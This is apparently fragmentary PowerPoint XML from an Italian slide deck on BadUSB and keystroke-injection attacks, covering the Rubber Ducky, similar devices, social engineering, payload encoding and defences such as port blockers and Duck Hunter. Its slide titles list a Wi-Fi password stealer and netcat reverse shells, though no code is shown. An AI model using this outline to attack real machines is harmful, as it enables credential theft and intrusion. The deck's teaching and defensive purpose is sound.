          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9505361" y="2239480"/>
            <a:ext cx="268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Contiene fino a 200 script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0570A7E-463B-A8DC-DD8E-34895E78F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759" y="1887535"/>
            <a:ext cx="914479" cy="91447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DDB6C6E-8E3C-9D30-E498-57EE33BD9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3589" y="2909466"/>
            <a:ext cx="914479" cy="914479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6EFA272-D5A7-F917-A734-3E1A716414AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9627004" y="3134858"/>
            <a:ext cx="214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Controllato in remoto tramite Wi-FI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4FE6DE7-460E-6B34-B98C-64807999AB58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9713203" y="4236046"/>
            <a:ext cx="227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Costo elevato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0C9C9978-8CDA-264D-FA4D-0BC8C27865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5781" y="4039619"/>
            <a:ext cx="89009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3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2769F2A-D2EA-6E65-24F6-F81AF2D7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69" y="80613"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Altri Strumenti</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene accendino&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9345F51B-188E-2078-902D-A4AFF564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5" y="2079241"/>
            <a:ext cx="2951730" cy="295173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5653F5F-463A-789A-97BB-C48EE5DD5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88" y="2577468"/>
            <a:ext cx="3269756" cy="2453503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, elettronico, circuito&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{622D6402-E9F9-0176-5E7C-04236587D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73" y="3448594"/>
            <a:ext cx="3616996" cy="229980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6FDCC6-1A1B-AC36-1008-9C90D842F0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4699905" y="1764873"/>
            <a:ext cx="279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PocketAdmin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58F93E-FCE3-E905-FF9C-ABC39B9B2470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1821334" y="4613491"/>
            <a:ext cx="279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Malduino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0C5ABE-6919-19E1-E3F8-D8A154E8602B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8668836" y="2681152"/>
            <a:ext cx="279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Wi-Fi Ducky</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20556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2769F2A-D2EA-6E65-24F6-F81AF2D7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69" y="80613"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Altri Strumenti – Digispark Attiny85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0570A7E-463B-A8DC-DD8E-34895E78F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91" y="1614157"/>
            <a:ext cx="914479" cy="914479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DDB6C6E-8E3C-9D30-E498-57EE33BD9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91" y="2736617"/>
            <a:ext cx="914479" cy="91447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C9C9978-8CDA-264D-FA4D-0BC8C2786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91" y="4434796"/>
            <a:ext cx="890093" cy="89009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47B5F9-1508-383C-B9ED-3823D00E53CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5990497" y="1687896"/>
            <a:ext cx="5467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Estremamente economica e facilmente reperibile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0747AF8-0A8A-509D-2358-6E24472A1DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5949143" y="2964458"/>
            <a:ext cx="546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Efficiente per gli script più semplici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A0CE0C4-245F-BB2F-6CC5-B4BD4C147B34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5949143" y="4367973"/>
            <a:ext cx="455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Diversi limiti</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, elettronico&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC47351C-CAA8-8B91-C928-4A0ED15AE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9" y="1542213"/>
            <a:ext cx="4541415" cy="24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5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2769F2A-D2EA-6E65-24F6-F81AF2D7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81" y="308770"/>
            <a:ext cx="4981571" cy="824705"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Attiny 85 W Wallpaper Setter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A6D480-8F0F-56BC-B9E0-4838007D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9" y="1319301"/>
            <a:ext cx="6063701" cy="36051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D022CDF-D2C7-87CE-FC33-A40E6CB77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8" y="1516620"/>
            <a:ext cx="5581793" cy="38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6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1C10D8-3655-FD2E-C011-56C7D4E8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00" y="95471"/>
            <a:ext cx="10766469" cy="132294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46D1088-EEF2-30CC-A709-86F5B6ABDFF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1391629" y="1640892"/>
            <a:ext cx="9408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/>
              <a:t>Formare i dipendenti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/>
              <a:t>Verificare le fonti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/>
              <a:t>Chiedere identificazione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/>
              <a:t>Non perdere la calma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/>
              <a:t>Password e traccia digitale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="728344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7E0D29-D3E1-1577-BFB1-A6D713B7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85" y="264700"/>
            <a:ext cx="4345756" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Port Blocker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene soppressore, elettronico&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49D546E8-37A4-1E09-FCEB-B7F1566E1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59" y="1794671"/>
            <a:ext cx="3759200" cy="28194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17DC49E-A412-C6D0-0E22-DD5B0C9D8FA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480110" y="1088905"/>
            <a:ext cx="4345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+mn-lt"/>
              </a:rPr>
              <a:t>Protezione del prompt  dei comandi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6D889FA-9040-A3A2-7161-C6F818BBC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110" y="2641576"/>
            <a:ext cx="6047756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olo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8AFDB72-6922-359F-7C19-38D0D82B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Device Control e Duck Hunter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F9717AD-1B7D-3A7A-F3B8-43237C81A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30" y="1690688"/>
            <a:ext cx="5371042" cy="196308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DEE5550-FE95-C959-F041-87BFAB8A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028" y="3555797"/>
            <a:ext cx="5383235" cy="847417"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Segnaposto contenuto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A1D36EDC-42F9-06AF-D689-A67EC99ED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42" y="1623477"/>
            <a:ext cx="5291657" cy="2640661"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Immagine 11" descr="Immagine che contiene testo, giocattolo, clipart, grafica vettoriale&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{680F682E-B213-E8C9-1977-4B84AAC99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220" y="3073618"/>
            <a:ext cx="1999750" cy="18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6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a illustrazione astratta con linee e simboli artificiali">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{301D5F70-1BEE-57EE-B9BB-D58BC1C68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94" r="10986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9BFD66-6E01-AF2B-D2B8-8FE4D6E3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Conclusioni e sviluppi Futuri</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25769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BB67C96-833F-075B-1867-418854D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71586"/>
            <a:ext cx="3091607" cy="827742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t>HID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Gadget su una scrivania">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47E87D0F-FFBF-1D58-7DCA-BC06AF58D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43C9A3-13CB-1838-059F-4FE299B4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8677" y="1203570"/>
            <a:ext cx="3704492" cy="4755104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Nel 1996 Microsoft ha introdotto lo standard Human Interface Device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Mouse, Tastiere ed altri HID sono il modo con cui comunichiamo ordini alla macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Oggi quasi tutti i device sono USB-HID e utilizzano la Universal Serial Bus per comunicare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6014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BB67C96-833F-075B-1867-418854D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" y="201275"/>
            <a:ext cx="8755870" cy="885444"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="5400"/>
              <a:t>BadUSB e Keystroke Injection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43C9A3-13CB-1838-059F-4FE299B4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486" y="1732588"/>
            <a:ext cx="5754896" cy="3527166"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>La diffusione massiccia dello standard USB è sia una comodità che una potenziale Vulnerabilità</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Una BadUSB è un dispositivo che, fingendosi Flash Drive, punta ad introdurre Malware o a trafugare documenti  da un PC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Keystroke Injection: Quando il dispositivo viene riconosciuto come una tastiera e “inietta” combinazioni di tasti pre-impostate.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74CA094-F0AC-2A07-42E8-2D4635369152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7146810" y="1086719"/>
            <a:ext cx="4491802" cy="4491802"/>
            <a:chOff x="459726" y="1345391"/>
            <a:chExt cx="4491802" cy="4491802"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Elemento grafico 2" descr="Segnale di divieto contorno">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E02E3FA-656A-D01B-1A68-FADB1F798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9726" y="1345391"/>
              <a:ext cx="4491802" cy="4491802"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Chiavetta USB contorno">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2649892C-05F1-C973-B841-65E6028FD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67544" y="1653209"/>
              <a:ext cx="3876165" cy="3876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2880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BB67C96-833F-075B-1867-418854D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485" y="230816"/>
            <a:ext cx="5754896" cy="885444"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="5400"/>
              <a:t>Rubber Ducky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649892C-05F1-C973-B841-65E6028FD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249" y="1171827"/>
            <a:ext cx="3876165" cy="387616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43C9A3-13CB-1838-059F-4FE299B4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709" y="1454368"/>
            <a:ext cx="6791306" cy="4344647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Primo strumento “ufficiale” di Keystroke Injection, pubblicato nel 2010 da Hak5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Sembra una chiavetta ma è una tastiera</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Utile per i System Admin e per i Pentester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Inietta lunghe sequenze di comandi al ritmo di 1000 parole al minuto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6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BB67C96-833F-075B-1867-418854DA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485" y="230816"/>
            <a:ext cx="5754896" cy="885444"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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Come è fatta?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="5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81CB7547-88E3-8CEE-D740-5A4540533E02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173936" y="1661622"/>
            <a:ext cx="3455097" cy="395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/>
              <a:t>Hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Core Microcontrollore AT32UC3B1256 CPU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Micro SD card reader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Pulsante</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Indicatore LED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Connettore Usb 2.0 Type A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Scocca da Flash Drive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Immagine che contiene testo, elettronico&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9F3C692-6655-5F0B-019E-68773A809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98" y="2095938"/>
            <a:ext cx="4881601" cy="2208924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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83895EC2-730E-8DBF-6868-563D30AEA16B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8203461" y="1894374"/>
            <a:ext cx="3455097" cy="306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/>
              <a:t>Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Payload (File Inject.bin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Encoder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10798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85" y="-26378"/>
            <a:ext cx="7510583" cy="2151185"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4400"/>
              <a:t>Pianificazione e Ricognizione –Social Engineering</a:t>
            </a:r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BA1432-A8EA-7A81-FE66-BE8152AA019E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4786923" y="1996960"/>
            <a:ext cx="7405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/>
              <a:t>Ottenere informazioni preliminari necessarie è fondamentale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/>
              <a:t>L’ingegneria sociale consiste nel guadagnare la fiducia dell’interlocutore e spingerlo a rivelare più informazioni private possibili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/>
              <a:t>Utile per ottenere password, accessi fisici o altre informazioni sul sistema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, computer, giocattolo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A45FA82-3DB7-D5B9-5CBA-1CDC06123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0" y="1954868"/>
            <a:ext cx="4471250" cy="26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517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69" y="54708"/>
            <a:ext cx="7510583" cy="1288561"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4400"/>
              <a:t>Scripting &amp; Encoding</a:t>
            </a:r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BA1432-A8EA-7A81-FE66-BE8152AA019E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233744" y="1397977"/>
            <a:ext cx="5795108" cy="385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/>
              <a:t>Fase intermedia pratica specifica per lo strumento:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT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/>
              <a:t>Progettare il codice provando le sequenze con la tastiera.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/>
              <a:t>Scrivere codice in Ducky Script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/>
              <a:t>Codificare  in binario in modo che RD comprenda le istruzioni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, screenshot, monitor, schermo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5B15ECC-7ED4-CA57-90CA-A79913C47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95" y="1397314"/>
            <a:ext cx="6004361" cy="36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8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CEF7814-F699-9F7F-A51D-26B933213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971" y="0"/>
            <a:ext cx="7510583" cy="1022132"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4400"/>
              <a:t>Scanning </a:t>
            </a:r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BA1432-A8EA-7A81-FE66-BE8152AA019E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3842759" y="1490887"/>
            <a:ext cx="7405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/>
              <a:t>Per capire come il nostro bersaglio reagirebbe a tentativi di intrusione testiamo il nostro payload su una macchina simile al bersaglio (macchina virtuale)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E305BB-A578-5E4B-DC26-761726B7598F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769159" y="3507149"/>
            <a:ext cx="5705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/>
              <a:t>Diverse scorciatoie da tastiera e diverse grammatiche dei terminali possono cambiare radicalmente il nosto approccio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30532C8-B6AA-8152-956D-5BBF67749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3" y="705543"/>
            <a:ext cx="1705825" cy="17058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18C471D-9455-CE94-47CA-57FC53394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18" y="1603613"/>
            <a:ext cx="1411847" cy="140949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11B6AA3-CBFB-E62E-E32B-693BA3F4E64C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5152316"/>
            <a:ext cx="114591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Offuscare e Ottimizzare</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Immagine 12" descr="Immagine che contiene testo, elettronico, tastiera, persona&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EC3E18E-21E6-C018-F821-6E417B527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91" y="3013107"/>
            <a:ext cx="3328992" cy="18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9906</TotalTime>
  <Words>608</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>126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Ebrima</vt:lpstr>
      <vt:lpstr>Tema di Office</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Trust (Fiducia)</vt:lpstr>
      <vt:lpstr>HID</vt:lpstr>
      <vt:lpstr>BadUSB e Keystroke Injection</vt:lpstr>
      <vt:lpstr>Rubber Ducky</vt:lpstr>
      <vt:lpstr>Come è fatta?</vt:lpstr>
      <vt:lpstr>Pianificazione e Ricognizione –Social Engineering</vt:lpstr>
      <vt:lpstr>Scripting &amp; Encoding</vt:lpstr>
      <vt:lpstr>Scanning </vt:lpstr>
      <vt:lpstr>Guadagnare l’accesso</vt:lpstr>
      <vt:lpstr>Scripting e Testing</vt:lpstr>
      <vt:lpstr>Ambiente di testing</vt:lpstr>
      <vt:lpstr>Gli Infiltrati</vt:lpstr>
      <vt:lpstr>Ducky Script</vt:lpstr>
      <vt:lpstr>Wi-Fi Password Stealer - 1</vt:lpstr>
      <vt:lpstr>Wi-Fi Password Stealer - 2</vt:lpstr>
      <vt:lpstr>Wi-Fi Password Stealer - 3</vt:lpstr>
      <vt:lpstr>Wi-Fi Password Stealer - 4</vt:lpstr>
      <vt:lpstr>Che cos’è un Reverse Shell con Netcat?</vt:lpstr>
      <vt:lpstr>Linux Ducky Reverse Shell</vt:lpstr>
      <vt:lpstr>Altri Strumenti - Hack5</vt:lpstr>
      <vt:lpstr>Altri Strumenti</vt:lpstr>
      <vt:lpstr>Altri Strumenti – Digispark Attiny85</vt:lpstr>
      <vt:lpstr>Attiny 85 W Wallpaper Setter</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Port Blocker</vt:lpstr>
      <vt:lpstr>Device Control e Duck Hunter</vt:lpstr>
      <vt:lpstr>Conclusioni e sviluppi Futuri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Massimiliano Buccolini</dc:creator>
  <cp:lastModifiedBy>Massimiliano Buccolini</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-15T07:24:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-23T21:07:47Z</dcterms:modified>
</cp:coreProperties>
</file>